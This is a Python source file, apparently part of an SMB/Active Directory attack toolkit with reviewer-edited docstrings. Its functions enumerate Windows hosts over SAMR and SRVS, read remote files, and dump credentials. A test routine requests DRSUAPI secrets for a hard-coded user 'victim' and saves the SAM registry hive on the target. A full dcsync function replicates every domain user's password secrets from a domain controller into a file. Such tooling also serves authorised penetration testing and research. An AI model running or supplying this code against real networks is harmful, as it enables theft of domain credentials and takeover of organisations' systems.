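async def list_localgroup_members(connection_string, groupname = 'Administrators', out_file = None, json_out = False):
    """Print the member SIDs of a local (Builtin) group on the target host.

    Connects over SMB with the credentials carried in ``connection_string``,
    opens the SAMR pipe, checks that the ``Builtin`` SAM domain exists,
    resolves the alias (local group) called ``groupname`` and prints one
    member SID per line, followed by ``Done!``.

    Args:
        connection_string: target + credential string understood by
            ``SMBTarget.from_connection_string`` and
            ``SMBCredential.from_connection_string``.
        groupname: name of the local group to enumerate (default
            ``Administrators``).
        out_file: accepted for interface compatibility; currently unused,
            output goes to stdout.
        json_out: accepted for interface compatibility; currently unused.

    Raises:
        Exception: if the Builtin domain or the requested group cannot be
            found, or if connecting to SAMR fails (the failure is logged
            with a traceback and then re-raised).
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()
        async with SMBSAMR(connection) as samr:
            logging.debug('Connecting to SAMR')
            try:
                await samr.connect()
            except Exception:
                # Nothing below can work without SAMR; the original logged
                # and carried on into a confusing secondary failure.
                logging.exception('Failed to connect to SAMR')
                raise

            # Local groups live in the special 'Builtin' SAM domain.
            found = False
            async for domain in samr.list_domains():
                if domain == 'Builtin':
                    found = True
                    logging.info('[+] Found Builtin domain')
            if not found:
                raise Exception('[-] Could not find Builtin domain. Fail.')

            domain_sid = await samr.get_domain_sid('Builtin')
            domain_handle = await samr.open_domain(domain_sid)

            # Resolve the alias RID for the requested group name.
            found = False
            target_rid = None
            async for name, rid in samr.list_aliases(domain_handle):
                if name == groupname:
                    target_rid = rid
                    found = True
                    logging.info('[+] Found %s group!' % name)
                    break
            if not found:
                # The original formatted the last *iterated* alias name here
                # (and raised NameError on an empty listing); report the
                # group that was actually asked for.
                raise Exception('[-] %s group not found! Fail.' % groupname)

            alias_handle = await samr.open_alias(domain_handle, target_rid)
            async for sid in samr.list_alias_members(alias_handle):
                print(sid)

    print('Done!')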
async def read_file(connection_string, filename):
    """Fetch ``filename`` from the SMB target and print its raw contents.

    Args:
        connection_string: target + credential string parsed by
            ``SMBTarget`` / ``SMBCredential``.
        filename: path of the remote file to open with ``SMBFileReader``.
    """
    smb_target = SMBTarget.from_connection_string(connection_string)
    smb_cred = SMBCredential.from_connection_string(connection_string)
    spnego_cred = AuthenticatorBuilder.to_spnego_cred(smb_cred, smb_target)

    async with SMBConnection(spnego_cred, smb_target) as conn:
        await conn.login()
        async with SMBFileReader(conn) as reader:
            await reader.open(filename)
            # Whole file in one read; the data is printed exactly as returned.
            print(await reader.read())
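async def filereader_test(connection_string, filename):
    """Ad-hoc probe: fetch one user's secrets over DRSUAPI, then dump the SAM hive.

    NOTE(review): ``filereader_test`` is defined several times in this module;
    the last definition wins at import time, so this one is shadowed.

    Steps:
      1. Connect and log in over SMB.
      2. Open DRSUAPI against the hard-coded domain ``TEST.corp``, pause for a
         key press, and request the secrets of the hard-coded user ``victim``.
         Any failure is printed with a traceback and the function returns.
      3. Ask the remote registry service to save the ``SAM`` hive to a random
         ``<8 hex chars>.tmp`` file; the printed path suggests it lands under
         ``SYSTEM32``. The hive is left on the target host — remember to
         remove it after use.

    The original carried unreachable srvsvc/wkssvc enumeration code after its
    final ``return``; that dead code is dropped here (no runtime change).

    Args:
        connection_string: target + credential string.
        filename: unused.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()
        try:
            t = SMBDRSUAPI(connection, 'TEST.corp')
            await t.connect()
            await t.open()
            input('open succsess!')  # debugging pause
            await t.get_user_secrets('victim')
        except Exception as e:
            import traceback
            traceback.print_exc()
            print('Error! %s' % e)
            return

        tmp_name = os.urandom(4).hex() + '.tmp'
        rreg = SMBRemoteRegistryService(connection)
        try:
            await rreg.save_hive('SAM', tmp_name)
            print('Success! Registry file should be in %s' % ('SYSTEM32\\' + tmp_name))
        finally:
            # The original only closed the service on the success path.
            await rreg.close()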
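async def list_sessions(connection_string, filename = None, json_out = False):
    """Print the sessions currently open on the target's server service.

    Uses the SRVS RPC interface over SMB and prints one ``username ip_addr``
    pair per session, then ``Done!``.

    Args:
        connection_string: target + credential string.
        filename: accepted for interface compatibility; currently unused.
        json_out: accepted for interface compatibility; currently unused.

    Raises:
        Exception: re-raised if connecting to SRVS fails (the original logged
            the failure and then continued, which can only fail later).
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()
        async with SMBSRVS(connection) as srvs:
            # The original log lines said 'SAMR' (copy-paste); this is SRVS.
            logging.debug('Connecting to SRVS')
            try:
                await srvs.connect()
            except Exception:
                logging.exception('Failed to connect to SRVS')
                raise
            async for username, ip_addr in srvs.list_sessions():
                print(username, ip_addr)

    print('Done!')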
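async def filereader_test(connection_string, filename):
    """Ad-hoc probe: list the shares exported by the target host.

    NOTE(review): ``filereader_test`` is defined several times in this module;
    the last definition wins at import time, so this one is shadowed.

    Prints the connection object (debug aid), then one
    ``name share_type remark`` line per share reported by SRVS.

    Args:
        connection_string: target + credential string.
        filename: unused.

    Raises:
        Exception: a login failure is printed and re-raised unchanged.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        try:
            await connection.login()
        except Exception as e:
            print(str(e))
            raise  # bare raise keeps the original traceback
        print(connection)
        # Context manager, as list_sessions does, so the SRVS pipe is closed
        # on exit; the original never closed it.
        async with SMBSRVS(connection) as srvs:
            await srvs.connect()
            async for name, share_type, remark in srvs.list_shares():
                print(name, share_type, remark)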
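async def filereader_test(connection_string, filename):
    """Ad-hoc SAMR probe: enumerate domains, users, groups and group memberships.

    NOTE(review): ``filereader_test`` is defined several times in this module;
    the last definition wins at import time, so this one is shadowed.

    The domain name ``TEST``, the user RID ``1106`` and the alias RID ``544``
    are hard-coded test fixtures; ``input(user_handle)`` pauses for a key
    press as a debugging aid. Everything is printed to stdout.

    Args:
        connection_string: target + credential string.
        filename: unused.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()
        # Context manager, as list_localgroup_members does, so the SAMR pipe
        # is closed on exit; the original never closed it.
        async with SMBSAMR(connection) as samr:
            await samr.connect()

            async for domain in samr.list_domains():
                print('domain: %s' % domain)

            domain_sid = await samr.get_domain_sid('TEST')
            print(str(domain_sid))
            domain_handle = await samr.open_domain(domain_sid)
            print(domain_handle)

            async for username in samr.list_domain_users(domain_handle):
                print(username)
            async for groupname in samr.list_domain_groups(domain_handle):
                print(groupname)
            async for sid, username in samr.enumerate_users(domain_handle):
                print(username, sid)

            user_handle = await samr.open_user(domain_handle, 1106)
            input(user_handle)  # debugging pause
            async for sid in samr.get_user_group_memberships(user_handle):
                print(sid)

            # Members of the Builtin alias with RID 544 (well-known
            # Administrators RID); local groups live in the 'Builtin' domain.
            local_domain_sid = await samr.get_domain_sid('Builtin')
            domain_handle = await samr.open_domain(local_domain_sid)
            alias_handle = await samr.open_alias(domain_handle, 544)
            async for sid in samr.list_alias_members(alias_handle):
                print(sid)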
async def filereader_test(connection_string, filename):
    """Ad-hoc probe: run SMBHostScanner against the target and print whatever it reports.

    NOTE(review): ``filereader_test`` is defined several times in this module;
    as the last definition, this is the one that survives import.

    Login is commented out below, so the scanner receives a connection that
    has not been authenticated here — presumably SMBHostScanner logs in on
    its own; confirm. The result loop is ``while True`` over
    ``results_queue.get()``: it never returns by itself and blocks forever
    once the scanner stops producing results. Whether the scanner posts a
    terminating sentinel is not visible from this file.

    Args:
        connection_string: target + credential string.
        filename: unused.
    """
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
    async with SMBConnection(spneg, target) as connection:
        # Login deliberately left disabled in the original; kept for reference.
        #try:
        #    await connection.login()
        #except Exception as e:
        #    print(str(e))
        #    raise e
        results_queue = asyncio.Queue()
        host_scanner = SMBHostScanner(connection, results_queue=results_queue)
        await host_scanner.run()
        # Drains the queue indefinitely; each result's type and value are printed.
        while True:
            res = await results_queue.get()
            print(type(res))
            print(res)
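async def dcsync(connection_string, filename=None, target_domain=None, target_users=None, json_out=False):
    """Replicate account secrets from a domain controller over DRSUAPI (DCSync).

    Logs in over SMB, uses SAMR to determine the domain (unless one is given),
    opens DRSUAPI against it and pulls the secrets of either the explicitly
    listed ``target_users`` or every user SAMR enumerates in the domain.
    Results go to ``filename`` when given, otherwise to stdout; ``Done!`` is
    printed at the end.

    Args:
        connection_string: target + credential string.
        filename: output path. Created/truncated with owner-only permissions
            (0600; the mode is not enforced on Windows) because the file holds
            credential material. ``None`` prints to stdout instead.
        target_domain: domain to replicate from. When ``None`` the first
            domain SAMR lists other than ``Builtin`` is used (``Builtin`` is
            the local SAM domain, not a replication target).
        target_users: usernames to fetch; empty/``None`` means all domain
            users. Was a mutable ``[]`` default in the original.
        json_out: when writing to a file, emit one JSON object per line
            (``secrets.to_dict()``) instead of ``str(secrets)``. Ignored
            for stdout output, which always prints ``str(secrets)``.

    Raises:
        Exception: re-raised when SAMR or DRSUAPI cannot be reached (the
            original logged and continued); also raised when no usable
            domain can be determined.

    Fixes relative to the original: ``loggign.exception`` NameError in the
    SAMR error path, missing line separator between JSON objects when
    ``target_users`` is given, and no file-permission restriction on the
    secrets dump.
    """
    if target_users is None:
        target_users = []
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)

    async with SMBConnection(spneg, target) as connection:
        await connection.login()
        async with SMBSAMR(connection) as samr:
            logging.debug('Connecting to SAMR')
            try:
                await samr.connect()
            except Exception:
                logging.exception('Failed to connect to SAMR')
                raise

            if target_domain is None:
                logging.debug('No domain defined, fetching it from SAMR')
                logging.debug('Fetching domains...')
                async for domain in samr.list_domains():
                    logging.debug('Domain available: %s' % domain)
                    # Take the first real domain; skip the local 'Builtin' SAM
                    # domain that list_localgroup_members shows SAMR returns.
                    if target_domain is None and domain != 'Builtin':
                        target_domain = domain
                if target_domain is None:
                    raise Exception('[-] Could not determine target domain from SAMR. Fail.')
            logging.debug('Using domain: %s' % target_domain)

            async with SMBDRSUAPI(connection, target_domain) as drsuapi:
                try:
                    await drsuapi.connect()
                    await drsuapi.open()
                except Exception:
                    logging.exception('Failed to connect to DRSUAPI!')
                    raise

                async def _selected_users():
                    # Yields the usernames to replicate: the explicit list, or
                    # every user SAMR enumerates in the target domain.
                    if target_users:
                        for username in target_users:
                            yield username
                        return
                    domain_sid = await samr.get_domain_sid(target_domain)
                    domain_handle = await samr.open_domain(domain_sid)
                    # NOTE(review): unpacked as (name, sid) here but iterated as a
                    # bare name elsewhere in this file — confirm against SMBSAMR.
                    async for username, user_sid in samr.list_domain_users(domain_handle):
                        yield username

                async def _dump(emit):
                    # Fetches each selected user's secrets and hands them to emit().
                    async for username in _selected_users():
                        secrets = await drsuapi.get_user_secrets(username)
                        emit(secrets)

                if filename is not None:
                    # Credential material: owner-only permissions from creation.
                    fd = os.open(filename, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
                    with os.fdopen(fd, 'w') as f:
                        def _write(secrets):
                            if json_out:
                                # One JSON object per line (the original omitted
                                # the separator on the explicit-users path).
                                f.write(json.dumps(secrets.to_dict()) + '\r\n')
                            else:
                                f.write(str(secrets))
                        await _dump(_write)
                else:
                    await _dump(lambda secrets: print(str(secrets)))

    print('Done!')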